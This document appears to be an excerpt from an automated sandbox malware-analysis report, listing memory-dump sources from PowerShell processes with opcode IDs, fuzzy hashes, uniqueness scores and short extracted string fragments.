                                                                                • Source File: 00000002.00000002.2718111613.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e5251bacec1e7da925673898ca41492115bdc3cf84d65b8a6c599e8ca45ed841
                                                                                • Instruction ID: c8ed31d4b75baa63555b298e17e1be89e194f307c0958ffe2a9ab670e5cdcb47
                                                                                • Opcode Fuzzy Hash: e5251bacec1e7da925673898ca41492115bdc3cf84d65b8a6c599e8ca45ed841
                                                                                • Instruction Fuzzy Hash: F6313831D1EED78FFBB5AB28285617865D1EF056A5B4401BAD41DC71D2FE1DD8004206
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2717122532.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                • Instruction ID: 6844502bb12e6936a31c054fe55ce34861744de46e0db52a3f4fb09dbe218d9a
                                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                • Instruction Fuzzy Hash: D001677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2527783782.0000000003840000.00000040.00000800.00020000.00000000.sdmp, Offset: 03840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_3840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a73ada5fb1396b6b72359260ba89c12331f6d4431aa89d5a77701ea30167c596
                                                                                • Instruction ID: 7a35d5fe6c53b3d63ca93714a98fde69d2025dd1a099800a2c3e68e80d3528e3
                                                                                • Opcode Fuzzy Hash: a73ada5fb1396b6b72359260ba89c12331f6d4431aa89d5a77701ea30167c596
                                                                                • Instruction Fuzzy Hash: A8B14BB0E0020D9FDB14CFA9D9857ADBBF2AF88314F188169D919EB654EB349941CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2527783782.0000000003840000.00000040.00000800.00020000.00000000.sdmp, Offset: 03840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_3840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93d2882d112bfee61d2998b9a3640508b838764bc615cadba5c9b9144b9d4e68
                                                                                • Instruction ID: 70218b95467a45f32e8f0db057190b2ef2b2b7088df83db3d96acaa930d5dd95
                                                                                • Opcode Fuzzy Hash: 93d2882d112bfee61d2998b9a3640508b838764bc615cadba5c9b9144b9d4e68
                                                                                • Instruction Fuzzy Hash: 7DB14870E0021D9FDF14CFA9C9817ADBBF2AF88314F18856DD915EB694EB349881CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$(f6l$(f6l$(f6l$(f6l$(f6l$(f6l$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.'k$-'k
                                                                                • API String ID: 0-4151937204
                                                                                • Opcode ID: fc1981b73d18ededab6e2b3d2a555b4b502d1b981f0aa87a6e561ae1fd222e28
                                                                                • Instruction ID: bbecad196d90475fcfcbbb33b5e77025feb523b83065ce322b98fbf011dbde15
                                                                                • Opcode Fuzzy Hash: fc1981b73d18ededab6e2b3d2a555b4b502d1b981f0aa87a6e561ae1fd222e28
                                                                                • Instruction Fuzzy Hash: B592D4B4B01205CFDB24CB58C852BAABBB2EF85304F1494AAD9059F755CB36ED81CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$x.'k$x.'k$x.'k$-'k$-'k
                                                                                • API String ID: 0-3696045213
                                                                                • Opcode ID: 546db904095119d08eef8ed69fede13faf1475e01a3aa9473b9628950f61c8bb
                                                                                • Instruction ID: 22198a7d1867d9259b4a77c5c48da7c635792e48898bbac2ce692dfa5721b022
                                                                                • Opcode Fuzzy Hash: 546db904095119d08eef8ed69fede13faf1475e01a3aa9473b9628950f61c8bb
                                                                                • Instruction Fuzzy Hash: F56292B4A002189FDB24DB24C991BDEBBB2EF89304F1085E5D909AB755CB359EC1CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                • API String ID: 0-3931768347
                                                                                • Opcode ID: 94362ba46e198ee16b7708993668d1b3a8e75c3617e7f15cf59ceee49703c28c
                                                                                • Instruction ID: 6e32c1a3981a269f425cdc14fa3f251a932cbe409dc0cbef953775fecfa5ef31
                                                                                • Opcode Fuzzy Hash: 94362ba46e198ee16b7708993668d1b3a8e75c3617e7f15cf59ceee49703c28c
                                                                                • Instruction Fuzzy Hash: F81205B1B01205CFCB14CB68C452AAABBF2EF85715F1480AAED059F355DB35DD81CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                • API String ID: 0-78369665
                                                                                • Opcode ID: 04f81f093fc357ee7d3218bd8989241c8cfba6d776d74a37f530f625747e48aa
                                                                                • Instruction ID: 904cd624b50ebb4012b6013f1ed6d792cb013d3176885a294a00443619b362f7
                                                                                • Opcode Fuzzy Hash: 04f81f093fc357ee7d3218bd8989241c8cfba6d776d74a37f530f625747e48aa
                                                                                • Instruction Fuzzy Hash: 6CE159B17053458FCB258F38CC126AABBA9FF85214F1484ABD645CF291DB35C985C7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$(f6l$(f6l$844l$844l$tP]q$tP]q$x.'k
                                                                                • API String ID: 0-2509013230
                                                                                • Opcode ID: 0ab3d8f59b111e3ad703e23689180f56568357d7f56c574da54ad25a799bb963
                                                                                • Instruction ID: 01401cb571c57bf5c2d387dd0326d6c74fcb2cd7fdd107566bab535cdeff5ef4
                                                                                • Opcode Fuzzy Hash: 0ab3d8f59b111e3ad703e23689180f56568357d7f56c574da54ad25a799bb963
                                                                                • Instruction Fuzzy Hash: 4D0235B4B01245DFCB14DB68C992BAEBBE2EF86314F148469D8059F795CB35DC80CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$(f6l$(f6l$(f6l$(f6l$(f6l$(f6l
                                                                                • API String ID: 0-574879865
                                                                                • Opcode ID: 53196f353a05ff1257a5bcca3d5a3216c9e3bca1e45b6ed81003c71f102aff21
                                                                                • Instruction ID: fc69055caf1878233c938d7ef4a32ce2ca29c214165323e536c17cad0560eb9f
                                                                                • Opcode Fuzzy Hash: 53196f353a05ff1257a5bcca3d5a3216c9e3bca1e45b6ed81003c71f102aff21
                                                                                • Instruction Fuzzy Hash: B262BDB4B01204CFDB14CB98C996A6ABBB2EF85304F24C469D9059F359CB76EC85CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.'k$-'k
                                                                                • API String ID: 0-263558672
                                                                                • Opcode ID: b0130aac1e894eb1546a7bb12ae1ca299bee57d63a8459a25a8af92c51c61a83
                                                                                • Instruction ID: b633ae5e6be03ed476f3fc39c3d70ebdd490ba1235a550510ed570e6c4723289
                                                                                • Opcode Fuzzy Hash: b0130aac1e894eb1546a7bb12ae1ca299bee57d63a8459a25a8af92c51c61a83
                                                                                • Instruction Fuzzy Hash: A4D1D0B0B012099FC718DB68C5A6BAEBBB2EF88704F10D464D9056F759CB35EC81CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q
                                                                                • API String ID: 0-1863188817
                                                                                • Opcode ID: 5df094b006d6818a478030d34888e48296122e860dc07842f4e7bd8057d2f357
                                                                                • Instruction ID: 858fd8175222a39ec6de9b55d16f95b4a92b2b0e6b8b3b80db587a862a01d151
                                                                                • Opcode Fuzzy Hash: 5df094b006d6818a478030d34888e48296122e860dc07842f4e7bd8057d2f357
                                                                                • Instruction Fuzzy Hash: 72F19AB6705346CFDB158B2DD8526AABBE6EFC6318F14846BD844CB651CB31C8C1CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$4']q$4']q$x.'k$x.'k$-'k
                                                                                • API String ID: 0-136534032
                                                                                • Opcode ID: f218f038f45aeacda752f83c40723c4083f214fed747fa4dc2af55b516e782ce
                                                                                • Instruction ID: ee2421b3d37ffd4cde43321662c0199c8a198730be78072d3fbd4ba8f5b0dd16
                                                                                • Opcode Fuzzy Hash: f218f038f45aeacda752f83c40723c4083f214fed747fa4dc2af55b516e782ce
                                                                                • Instruction Fuzzy Hash: BEF193B4A002159FD724DB28C991F6ABBB3EF84304F10C4A5D9096F795CB75AE81CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$4']q$4']q$x.'k$x.'k
                                                                                • API String ID: 0-303458777
                                                                                • Opcode ID: 87d78b546b5c690c6d6f73744749ba53c7f9d3cc5069d7e0145e7e9086265550
                                                                                • Instruction ID: 037da9533be0b38c41f9682b90df9194f7a575e3e2d3eca0f014a4cce4b1123f
                                                                                • Opcode Fuzzy Hash: 87d78b546b5c690c6d6f73744749ba53c7f9d3cc5069d7e0145e7e9086265550
                                                                                • Instruction Fuzzy Hash: F5027FB4A002199FDB24DB24C995BEDBBB2EB48304F10C1E5D909AB755CB35AEC1CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$4']q$4']q$x.'k$x.'k$-'k
                                                                                • API String ID: 0-631053049
                                                                                • Opcode ID: ccb636b72c1c078bdfa629e3da5e5acd04f822390889798c4378eb5dc784d853
                                                                                • Instruction ID: f395d9d3f5e93a1d55efb7eac1d278704776b2c9a66b89a55325fc34e7c852e6
                                                                                • Opcode Fuzzy Hash: ccb636b72c1c078bdfa629e3da5e5acd04f822390889798c4378eb5dc784d853
                                                                                • Instruction Fuzzy Hash: 00E1E3B0A002149FD714DB28C995BAEBBB3EF84304F1085E5D909AF795CB75AE81CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$(f6l$(f6l$`B(k
                                                                                • API String ID: 0-636519930
                                                                                • Opcode ID: 6b8adc9ec09e3409960a8ec6398994e03e8e95728d730da723994ee1168631a7
                                                                                • Instruction ID: 492e4078386fc0dcaf2325eedbdf98809f1f9d8a9ee5a5cebc5f0ef690a42e4d
                                                                                • Opcode Fuzzy Hash: 6b8adc9ec09e3409960a8ec6398994e03e8e95728d730da723994ee1168631a7
                                                                                • Instruction Fuzzy Hash: C9229FB4B01209DFDB14CB58C552BAABBF2EF89318F14D0A9DA059B755CB32DC81CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q$4']q$x.'k$-'k
                                                                                • API String ID: 0-3873933780
                                                                                • Opcode ID: b3810bd5462a63819c662603e2fc650619778e23123a2ff1f369baba0328ef8d
                                                                                • Instruction ID: baee8917bb307d8cdcae6a0e6e6b383b38330dcd9fbfc1d18aa1947e0bcf6411
                                                                                • Opcode Fuzzy Hash: b3810bd5462a63819c662603e2fc650619778e23123a2ff1f369baba0328ef8d
                                                                                • Instruction Fuzzy Hash: BFB1BDB4A01205DFCB14CB68C592B9EBBB2EF89B08F11D469D8056F359CB75E881CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$(f6l
                                                                                • API String ID: 0-760347988
                                                                                • Opcode ID: 1cb3f5b80fe2fcd0b11ab2bb47e5212fbbfc880efa4e2fdbabc5e75509c35f53
                                                                                • Instruction ID: 3b533adbd890ed36024ace1f2149d31d41f45fde0d05800457cfad5c5d8dfd1b
                                                                                • Opcode Fuzzy Hash: 1cb3f5b80fe2fcd0b11ab2bb47e5212fbbfc880efa4e2fdbabc5e75509c35f53
                                                                                • Instruction Fuzzy Hash: D8326AB4A01204CFDB14CB98C586EA9BBB2EB85308F25D0A9D9099F755C772EC85CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$(f6l
                                                                                • API String ID: 0-760347988
                                                                                • Opcode ID: 9842b67c16b8110268f860788be40c93d78b28ae8d4e0f29457d4fc908d8147e
                                                                                • Instruction ID: ccd17c09a5a45522bfba4dd4a50566e5e54f319b359c7d06777f5af1661cdc30
                                                                                • Opcode Fuzzy Hash: 9842b67c16b8110268f860788be40c93d78b28ae8d4e0f29457d4fc908d8147e
                                                                                • Instruction Fuzzy Hash: 861289B4A11205CFD714CB98C986EA9BBB2EF85308F24D0A9E9059F355C776EC85CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l$h2)k
                                                                                • API String ID: 0-2395912248
                                                                                • Opcode ID: 21e07a308aa3341318524c19b95853bf0ff6a5684dd222b2261dd622abdf9dc9
                                                                                • Instruction ID: dc0be5d67e986bf4bf44133fc91abda18bb7dbd138deccb734d103260ee0e489
                                                                                • Opcode Fuzzy Hash: 21e07a308aa3341318524c19b95853bf0ff6a5684dd222b2261dd622abdf9dc9
                                                                                • Instruction Fuzzy Hash: 31029FB4A01209DFD714CB58C592FAABBF2EF89308F15C0A9DA059B755C772EC81CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l$(f6l
                                                                                • API String ID: 0-2913257441
                                                                                • Opcode ID: f3fa3302130c359ca6cb5820c38ffd8b798eba07dd7058d8f4e2803ec67105a6
                                                                                • Instruction ID: 9717503cb5beb2d0471053dfd06e6a1e215a85057373adc04337e27d72621658
                                                                                • Opcode Fuzzy Hash: f3fa3302130c359ca6cb5820c38ffd8b798eba07dd7058d8f4e2803ec67105a6
                                                                                • Instruction Fuzzy Hash: A7027CB4A01209DFDB14CB58C592EAABBF2BF89718F14D0A9D9049B755C732EC81CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 844l$tP]q
                                                                                • API String ID: 0-3318388623
                                                                                • Opcode ID: b91b0332077f05d3dbfcc21988c91fb96b7172e637bb95217adefb566cec8bbe
                                                                                • Instruction ID: e717c1a9d00c658a05ecb4de33b24020012b93b5e44b6a794ef954dab5edb657
                                                                                • Opcode Fuzzy Hash: b91b0332077f05d3dbfcc21988c91fb96b7172e637bb95217adefb566cec8bbe
                                                                                • Instruction Fuzzy Hash: CF51B0B060A3859FC7128B68C851A55BFF5AF8A318F19C4DAD584DF2A3C7319C85C761
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (f6l
                                                                                • API String ID: 0-3313521497
                                                                                • Opcode ID: 77121fdf0df2c22bb4cc3798cec45744e11283124f0c945ce42108c33b14631f
                                                                                • Instruction ID: 24fc68cf8dede5f2f3a533f30832cfab78f8eb2ca65de5ebea1669e42027b7c9
                                                                                • Opcode Fuzzy Hash: 77121fdf0df2c22bb4cc3798cec45744e11283124f0c945ce42108c33b14631f
                                                                                • Instruction Fuzzy Hash: CA815AB4A01205DFDB14CF58C592AA9BBF2EF88715F14D0A9E805AB355D732EC81CF61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q
                                                                                • API String ID: 0-1259897404
                                                                                • Opcode ID: 536d5336a3883b6b8f23541ea5d1136242836ffd862d57c00427626ca537dfa2
                                                                                • Instruction ID: e7a9ee8b9579a704fae1edf835dc81a3b6770846f592d2ceaafe66d75ad7fcd9
                                                                                • Opcode Fuzzy Hash: 536d5336a3883b6b8f23541ea5d1136242836ffd862d57c00427626ca537dfa2
                                                                                • Instruction Fuzzy Hash: 513106F1B063119FDB245B3488527BA7BE19F82756F1500E6FD00DB282E7798980C7A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2538114020.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7e10000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: x.'k
                                                                                • API String ID: 0-3183031856
                                                                                • Opcode ID: 154087fd5d3c4095d0c3d09b1481fda67ce4192150da5c89ed7a7183f3c2341c
                                                                                • Instruction ID: 5dd24fcc5385aef4e64ceb45fe1d9cb1aee25f417fdd4247a00c952ec03bc666
                                                                                • Opcode Fuzzy Hash: 154087fd5d3c4095d0c3d09b1481fda67ce4192150da5c89ed7a7183f3c2341c
                                                                                • Instruction Fuzzy Hash: B931E7B4B40104ABD704A764C996FAFBBA3EF85744F108464E9017F795CF7AAC41CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2527783782.0000000003840000.00000040.00000800.00020000.00000000.sdmp, Offset: 03840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_3840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bbee75d4080db84fd73c3e81fdf1a4bb4cf5e723bbd97c705b03bb2120e9106
                                                                                • Instruction ID: 429927390d52996e5c16b9a81892d44e9da8f5cbe69a7839f56731a9db70d324
                                                                                • Opcode Fuzzy Hash: 8bbee75d4080db84fd73c3e81fdf1a4bb4cf5e723bbd97c705b03bb2120e9106
                                                                                • Instruction Fuzzy Hash: 19B15AB0E0020D9FDB10CFE9D88579DFBF2AF88318F188169D919E7654EB349945CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2527783782.0000000003840000.00000040.00000800.00020000.00000000.sdmp, Offset: 03840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_3840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 738738a27c37bac45d0850b0bd8aadf00fd7469bce3d6ca205a26fedf96ed91f
                                                                                • Instruction ID: 73135075f4c3f5e3fb24c881231190787725a52d8775c1c9f6666327a8b4935a
                                                                                • Opcode Fuzzy Hash: 738738a27c37bac45d0850b0bd8aadf00fd7469bce3d6ca205a26fedf96ed91f
                                                                                • Instruction Fuzzy Hash: 7BA17D35A002089FDB24DFE4D944A9EB7F6FF85304F158599D806EF668DB38AD49CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2527783782.0000000003840000.00000040.00000800.00020000.00000000.sdmp, Offset: 03840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_3840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1cb9977aea04a0eef2ae07bfdb2d052e49c008ab588fd27b3f22b7ea21b2830e
                                                                                • Instruction ID: 106030e247930b09b4ead82b2b6afebd56277b266631b0ab11e9ada901496790
                                                                                • Opcode Fuzzy Hash: 1cb9977aea04a0eef2ae07bfdb2d052e49c008ab588fd27b3f22b7ea21b2830e
                                                                                • Instruction Fuzzy Hash: 16A13770E0021D9FDB10CFE8D98579EBBF2AF88314F188569E915EB654EB349885CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2527783782.0000000003840000.00000040.00000800.00020000.00000000.sdmp, Offset: 03840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_3840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 39ae5f4c82701e63eea40dea063054261b9c2447196d4fa68a52a0f0f7370a59
                                                                                • Instruction ID: d19df61cf7ee122e7ece34fe3e074d693784da0d91a42481beef362a54941747
                                                                                • Opcode Fuzzy Hash: 39ae5f4c82701e63eea40dea063054261b9c2447196d4fa68a52a0f0f7370a59
                                                                                • Instruction Fuzzy Hash: 6E91CE34A002489FCB14DFA8D9849AEBBF2FF89314F1885A9E445DB761CB35ED85CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2527783782.0000000003840000.00000040.00000800.00020000.00000000.sdmp, Offset: 03840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_3840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2a240740e4fd74e16a9e0fa588a1ec1c57e975818954bf6788eb8ad9384ae20c
                                                                                • Instruction ID: 7695602076d1c9e53007dbdec786dbce3138ba6b3656f5c8e703469409bbf4f2
                                                                                • Opcode Fuzzy Hash: 2a240740e4fd74e16a9e0fa588a1ec1c57e975818954bf6788eb8ad9384ae20c
                                                                                • Instruction Fuzzy Hash: FD71E4B19083858FCB02DB6CD9A46D9BFB0FF4B310F1941DAC4948B253E7249D4ACBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2527783782.0000000003840000.00000040.00000800.00020000.00000000.sdmp, Offset: 03840000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_3840000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
